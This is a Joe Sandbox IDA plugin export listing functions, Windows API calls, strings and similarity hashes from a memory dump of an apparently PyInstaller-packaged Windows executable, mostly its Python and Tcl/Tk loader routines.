Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 739fc36d95d46a0547d4d4511d317fb5cae8f37791182581b6b727d6f7db331d
Instruction ID: a7a068711225851f61a852781a240abd2cc68a813f7fcc057308b23b96977f74
Opcode Fuzzy Hash: 739fc36d95d46a0547d4d4511d317fb5cae8f37791182581b6b727d6f7db331d
Instruction Fuzzy Hash: 8D418456D187C192EA11AF2495052BDA370FFE5744F88A232DB8D42247EF28E6C9C320

Non-executed Functions

Function 00007FF759952F20 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759952F36
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759952F75
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759952F9A
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759952FBF
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759952FE7
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF75995300F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759953037
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF75995305F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759953087

Strings

Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF759953669
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF7599534D9
PySys_SetObject, xrefs: 00007FF7599535D5
PySys_GetObject, xrefs: 00007FF7599535AD
Failed to get address for PyObject_CallFunction, xrefs: 00007FF759953489
PyErr_Clear, xrefs: 00007FF759953265
PySys_AddWarnOption, xrefs: 00007FF75995355D
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF759953709
Failed to get address for PySys_SetPath, xrefs: 00007FF759953619
PyList_Append, xrefs: 00007FF7599533CD
PyErr_Occurred, xrefs: 00007FF75995328D
Failed to get address for PyModule_GetDict, xrefs: 00007FF759953461
Failed to get address for Py_FileSystemDefaultEncoding, xrefs: 00007FF759952F87
Py_Finalize, xrefs: 00007FF759953125
Failed to get address for Py_GetPath, xrefs: 00007FF7599531E1
Failed to get address for PyList_New, xrefs: 00007FF759953411
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF759953551
Failed to get address for Py_IgnoreEnvironmentFlag, xrefs: 00007FF759952FD1
PyObject_GetAttrString, xrefs: 00007FF7599534E5
Failed to get address for Py_Initialize, xrefs: 00007FF759953191
PyMem_RawFree, xrefs: 00007FF7599536C5
PyImport_AddModule, xrefs: 00007FF759953355
PyObject_CallFunctionObjArgs, xrefs: 00007FF759953495
PyEval_EvalCode, xrefs: 00007FF759953625
PyUnicode_AsUTF8, xrefs: 00007FF759953765
PyList_New, xrefs: 00007FF7599533F5
Failed to get address for Py_NoSiteFlag, xrefs: 00007FF759952FF9
Failed to get address for PyLong_AsLong, xrefs: 00007FF759953439
Failed to get address for PyUnicode_Join, xrefs: 00007FF7599537A9
Py_IncRef, xrefs: 00007FF75995314D
GetProcAddress, xrefs: 00007FF759952F4F
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF759953759
Failed to get address for Py_NoUserSiteDirectory, xrefs: 00007FF759953021
Py_NoUserSiteDirectory, xrefs: 00007FF759953005
PyUnicode_FromString, xrefs: 00007FF759953675
Failed to get address for Py_IncRef, xrefs: 00007FF759953169
Py_IgnoreEnvironmentFlag, xrefs: 00007FF759952FB5
Failed to get address for Py_UnbufferedStdioFlag, xrefs: 00007FF759953099
Failed to get address for PyDict_GetItemString, xrefs: 00007FF759953259
Py_Initialize, xrefs: 00007FF759953175
PyMarshal_ReadObjectFromString, xrefs: 00007FF75995364D
Failed to get address for PySys_AddWarnOption, xrefs: 00007FF759953579
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF759953501
Failed to get address for PySys_SetArgvEx, xrefs: 00007FF7599535A1
Py_DecodeLocale, xrefs: 00007FF75995369D
PyObject_CallFunction, xrefs: 00007FF75995346D
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF759953399
Failed to get address for PyUnicode_FromString, xrefs: 00007FF759953691
PyUnicode_Replace, xrefs: 00007FF7599537B5
Failed to get address for PyEval_EvalCode, xrefs: 00007FF759953641
Failed to get address for PyErr_Restore, xrefs: 00007FF759953321
Failed to get address for Py_DontWriteBytecodeFlag, xrefs: 00007FF759952F48
Failed to get address for Py_UTF8Mode, xrefs: 00007FF7599530C9
PySys_SetPath, xrefs: 00007FF7599535FD
Failed to get address for Py_Finalize, xrefs: 00007FF759953141
PyUnicode_Join, xrefs: 00007FF75995378D
Failed to get address for Py_FrozenFlag, xrefs: 00007FF759952FAC
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF7599534B1
PyUnicode_DecodeFSDefault, xrefs: 00007FF75995373D
PyModule_GetDict, xrefs: 00007FF759953445
Failed to get address for PySys_SetObject, xrefs: 00007FF7599535F1
Failed to get address for PyMem_RawFree, xrefs: 00007FF7599536E1
PyErr_Fetch, xrefs: 00007FF7599532DD
Failed to get address for Py_BuildValue, xrefs: 00007FF7599530F1
PyErr_NormalizeException, xrefs: 00007FF75995332D
PyErr_Print, xrefs: 00007FF7599532B5
Failed to get address for Py_SetProgramName, xrefs: 00007FF759953209
PyLong_AsLong, xrefs: 00007FF75995341D
Failed to get address for PyImport_AddModule, xrefs: 00007FF759953371
PyObject_SetAttrString, xrefs: 00007FF7599534BD
PyImport_ImportModule, xrefs: 00007FF7599533A5
Py_UTF8Mode, xrefs: 00007FF7599530AD
Py_OptimizeFlag, xrefs: 00007FF75995302D
PyErr_Restore, xrefs: 00007FF759953305
Failed to get address for PyImport_ImportModule, xrefs: 00007FF7599533C1
Py_SetProgramName, xrefs: 00007FF7599531ED
Failed to get address for Py_OptimizeFlag, xrefs: 00007FF759953049
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF759953781
Failed to get address for PyList_Append, xrefs: 00007FF7599533E9
Failed to get address for PyErr_Print, xrefs: 00007FF7599532D1
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF759953349
Py_VerboseFlag, xrefs: 00007FF759953055
Failed to get address for Py_SetPythonHome, xrefs: 00007FF759953231
Failed to get address for PyErr_Occurred, xrefs: 00007FF7599532A9
Py_SetPythonHome, xrefs: 00007FF759953215
Py_SetPath, xrefs: 00007FF75995319D
Failed to get address for PyUnicode_Decode, xrefs: 00007FF759953731
Failed to get address for Py_DecRef, xrefs: 00007FF759953119
Failed to get address for PyErr_Clear, xrefs: 00007FF759953281
PyImport_ExecCodeModule, xrefs: 00007FF75995337D
Py_DecRef, xrefs: 00007FF7599530FD
PySys_SetArgvEx, xrefs: 00007FF759953585
Py_BuildValue, xrefs: 00007FF7599530D5
Py_UnbufferedStdioFlag, xrefs: 00007FF75995307D
Failed to get address for Py_DecodeLocale, xrefs: 00007FF7599536B9
PyObject_Str, xrefs: 00007FF75995350D
PyUnicode_Decode, xrefs: 00007FF759953715
Failed to get address for PyUnicode_Replace, xrefs: 00007FF7599537D1
Py_DontWriteBytecodeFlag, xrefs: 00007FF759952F2F
Failed to get address for Py_SetPath, xrefs: 00007FF7599531B9
Failed to get address for PyErr_Fetch, xrefs: 00007FF7599532F9
Py_GetPath, xrefs: 00007FF7599531C5
Py_FrozenFlag, xrefs: 00007FF759952F90
PyUnicode_FromFormat, xrefs: 00007FF7599536ED
PyDict_GetItemString, xrefs: 00007FF75995323D
PyRun_SimpleStringFlags, xrefs: 00007FF759953535
Py_FileSystemDefaultEncoding, xrefs: 00007FF759952F6B
Failed to get address for PySys_GetObject, xrefs: 00007FF7599535C9
Failed to get address for Py_VerboseFlag, xrefs: 00007FF759953071
Py_NoSiteFlag, xrefs: 00007FF759952FDD
Failed to get address for PyObject_Str, xrefs: 00007FF759953529

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
API String ID: 190572456-3109299426
Opcode ID: 3d8788b48c699204fb620db4b6681a167f3e5177f9efbc96361098fa63709e71
Instruction ID: 8b674339008928456d20b6302d4ce796f65f6b81576aacf580fa7cb8b70402d5
Opcode Fuzzy Hash: 3d8788b48c699204fb620db4b6681a167f3e5177f9efbc96361098fa63709e71
Instruction Fuzzy Hash: 63429FA4A0AB03A1FA55BF05B854179E3B5AFCA791FCC5435C80E06768FFBCE5489321

Function 00007FF759956670 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(WideCharToMultiByte,00007FF759951CE4,?,?,00000000,00007FF759956904), ref: 00007FF759956697
FormatMessageW.KERNEL32 ref: 00007FF7599566C6
WideCharToMultiByte.KERNEL32 ref: 00007FF75995671C

Part of subcall function 00007FF759951CB0: GetLastError.KERNEL32(?,?,00000000,00007FF759956904,?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF759951CD7

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF759956726
PyInstaller: FormatMessageW failed., xrefs: 00007FF7599566E3
WideCharToMultiByte, xrefs: 00007FF759956670, 00007FF75995672D
No error messages generated., xrefs: 00007FF7599566D0
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF759956739
FormatMessageW, xrefs: 00007FF7599566D7

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorLast$ByteCharFormatMessageMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2383786077-2573406579
Opcode ID: ee4750cad08e904e569e44cd6da303e01fcfffc44399732fd87d74f29f2688a4
Instruction ID: 78f771f358e269c43d0bcbec440f4a86c9ed028f17164eb95f86f3c897d52d0b
Opcode Fuzzy Hash: ee4750cad08e904e569e44cd6da303e01fcfffc44399732fd87d74f29f2688a4
Instruction Fuzzy Hash: C8214C71A18A4292FB60AF15E8542AAA3B5FFC9385FCC0135E54D826A4FF3DE149C720

Function 00007FF75995AA2C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF75995AA48
RtlCaptureContext.KERNEL32 ref: 00007FF75995AA75
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF75995AA8F
RtlVirtualUnwind.KERNEL32 ref: 00007FF75995AAD0
IsDebuggerPresent.KERNEL32 ref: 00007FF75995AB24
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF75995AB45
UnhandledExceptionFilter.KERNEL32 ref: 00007FF75995AB50

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 414c3b7d1a52ef3ba5408d69683659119c26abb58edcf35ad0cee906abb0d3fb
Instruction ID: 730d01cf703fc721a38a6d18c2fe461349dc38daeefdcf63bf65eed5b5e4738c
Opcode Fuzzy Hash: 414c3b7d1a52ef3ba5408d69683659119c26abb58edcf35ad0cee906abb0d3fb
Instruction Fuzzy Hash: 0C315E72609A819AEB60AF60E8403EEB3B5FB85744F884439DA4D47A94DF3CD548C724

Function 00007FF759969C44 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF759969CBD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF759969CD5
RtlVirtualUnwind.KERNEL32 ref: 00007FF759969D10
IsDebuggerPresent.KERNEL32 ref: 00007FF759969D49
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF759969D53
UnhandledExceptionFilter.KERNEL32 ref: 00007FF759969D5E

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5dfb057c3f1a11160ff10646ccc1b52b02cf652cbed9a545e94d4dbf2c44da7d
Instruction ID: 16356ce668b527e5817db9bac3d22172325d9fb78a78fb731c0026d9730a5b5a
Opcode Fuzzy Hash: 5dfb057c3f1a11160ff10646ccc1b52b02cf652cbed9a545e94d4dbf2c44da7d
Instruction Fuzzy Hash: 38315E32618B8296EB60DF25E8402AEB3B4FBC9754F980135EA8D47B94DF3CD155CB10

Function 00007FF759970A34 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759970A80
FindFirstFileExW.KERNEL32 ref: 00007FF759970B8A

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ced153bd746da3696451066ca553fc750e98195ae426049d21287c39b66479d4
Instruction ID: e7a2b7d2bd27d0c9be27516b5de5c1c40a854499ef20e6588ed8e3b25bc4e545
Opcode Fuzzy Hash: ced153bd746da3696451066ca553fc750e98195ae426049d21287c39b66479d4
Instruction Fuzzy Hash: 79B19322B1869281EE61AF25E4002BDE371EBC6BE4F8C5131E95D4BAC5DF7CE441C320

Function 00007FF759972620 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF759972624

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5644672d7aec8b178d5bd48a95ace976e45fdc56d1edf0a539dccc581205543b
Instruction ID: 1121624fd7e93161a457f54036f4e72d14297739ef04790bb6a16e43ba938707
Opcode Fuzzy Hash: 5644672d7aec8b178d5bd48a95ace976e45fdc56d1edf0a539dccc581205543b
Instruction Fuzzy Hash: A0B09220F07B02C2EE083F216D8262862B87FC8B11FCC0038C00C80320DF2C60AA5731

Function 00007FF759954730 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF759956310: LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759956333

GetProcAddress.KERNEL32 ref: 00007FF7599550C7
GetProcAddress.KERNEL32 ref: 00007FF759955106
GetProcAddress.KERNEL32 ref: 00007FF75995512B
GetProcAddress.KERNEL32 ref: 00007FF759955150
GetProcAddress.KERNEL32 ref: 00007FF759955178
GetProcAddress.KERNEL32 ref: 00007FF7599551A0
GetProcAddress.KERNEL32 ref: 00007FF7599551C8
GetProcAddress.KERNEL32 ref: 00007FF7599551F0
GetProcAddress.KERNEL32 ref: 00007FF759955218

Strings

Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF75995545A
Tcl_NewByteArrayObj, xrefs: 00007FF759955416
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF75995527A
Tcl_GetVar2, xrefs: 00007FF75995534E
Tcl_CreateObjCommand, xrefs: 00007FF75995539E
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF7599552CA
Failed to get address for Tk_Init, xrefs: 00007FF759955572
Tcl_ThreadQueueEvent, xrefs: 00007FF7599552FE
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF7599552A2
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF75995513D
LOADER: Failed to load tcl/tk libraries, xrefs: 00007FF75995477A
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF75995559A
Failed to get address for Tcl_GetString, xrefs: 00007FF7599553E2
Failed to get address for Tcl_Init, xrefs: 00007FF7599550D9
Failed to get address for Tcl_MutexLock, xrefs: 00007FF759955252
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF75995540A
Tcl_SetVar2Ex, xrefs: 00007FF75995543E
Failed to get address for Tcl_SetVar2, xrefs: 00007FF759955392
Failed to get address for Tcl_EvalFile, xrefs: 00007FF7599554AA
Tcl_EvalEx, xrefs: 00007FF7599554B6
Tcl_Free, xrefs: 00007FF75995552E
Tcl_GetObjResult, xrefs: 00007FF759955466
Tcl_ConditionWait, xrefs: 00007FF7599552D6
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF759955342
Tcl_ThreadAlert, xrefs: 00007FF759955326
Failed to get address for Tcl_Finalize, xrefs: 00007FF75995518A
Tcl_Init, xrefs: 00007FF7599550C0
Tcl_EvalObjv, xrefs: 00007FF7599554DE
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF7599552F2
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF759955118
Tcl_FinalizeThread, xrefs: 00007FF759955196
Tcl_Finalize, xrefs: 00007FF75995516E
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF759955482
GetProcAddress, xrefs: 00007FF7599550E0
Failed to get address for Tcl_EvalEx, xrefs: 00007FF7599554D2
Tcl_NewStringObj, xrefs: 00007FF7599553EE
Tcl_MutexLock, xrefs: 00007FF759955236
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF75995531A
Failed to get address for Tcl_Free, xrefs: 00007FF75995554A
Tcl_DeleteInterp, xrefs: 00007FF7599551BE
Tk_Init, xrefs: 00007FF759955556
Tcl_DoOneEvent, xrefs: 00007FF759955146
Tcl_FindExecutable, xrefs: 00007FF759955121
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF759955162
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF7599551B2
Tcl_SetVar2, xrefs: 00007FF759955376
Tcl_Alloc, xrefs: 00007FF759955506
Tcl_ConditionFinalize, xrefs: 00007FF759955286
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF75995522A
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF7599554FA
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF7599553BA
Failed to get address for Tcl_Alloc, xrefs: 00007FF759955522
Tcl_MutexUnlock, xrefs: 00007FF75995525E
Tcl_CreateThread, xrefs: 00007FF7599551E6
Tk_GetNumMainWindows, xrefs: 00007FF75995557E
Tcl_EvalFile, xrefs: 00007FF75995548E
Failed to get address for Tcl_CreateThread, xrefs: 00007FF759955202
Tcl_GetString, xrefs: 00007FF7599553C6
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF7599551DA
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF759955432
Tcl_GetCurrentThread, xrefs: 00007FF75995520E
Failed to get address for Tcl_GetVar2, xrefs: 00007FF75995536A
Tcl_ConditionNotify, xrefs: 00007FF7599552AE
Tcl_CreateInterp, xrefs: 00007FF7599550FC

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 2238633743-1453502826
Opcode ID: 387b05963c1573a630a89e02a7d3e5c8a0eed87054fdcdadb8995d5c72bb8a89
Instruction ID: d32fad8c5bd2f95c088e31af1ae9ddfe643d2e65732fed61aef09db8abe072ac
Opcode Fuzzy Hash: 387b05963c1573a630a89e02a7d3e5c8a0eed87054fdcdadb8995d5c72bb8a89
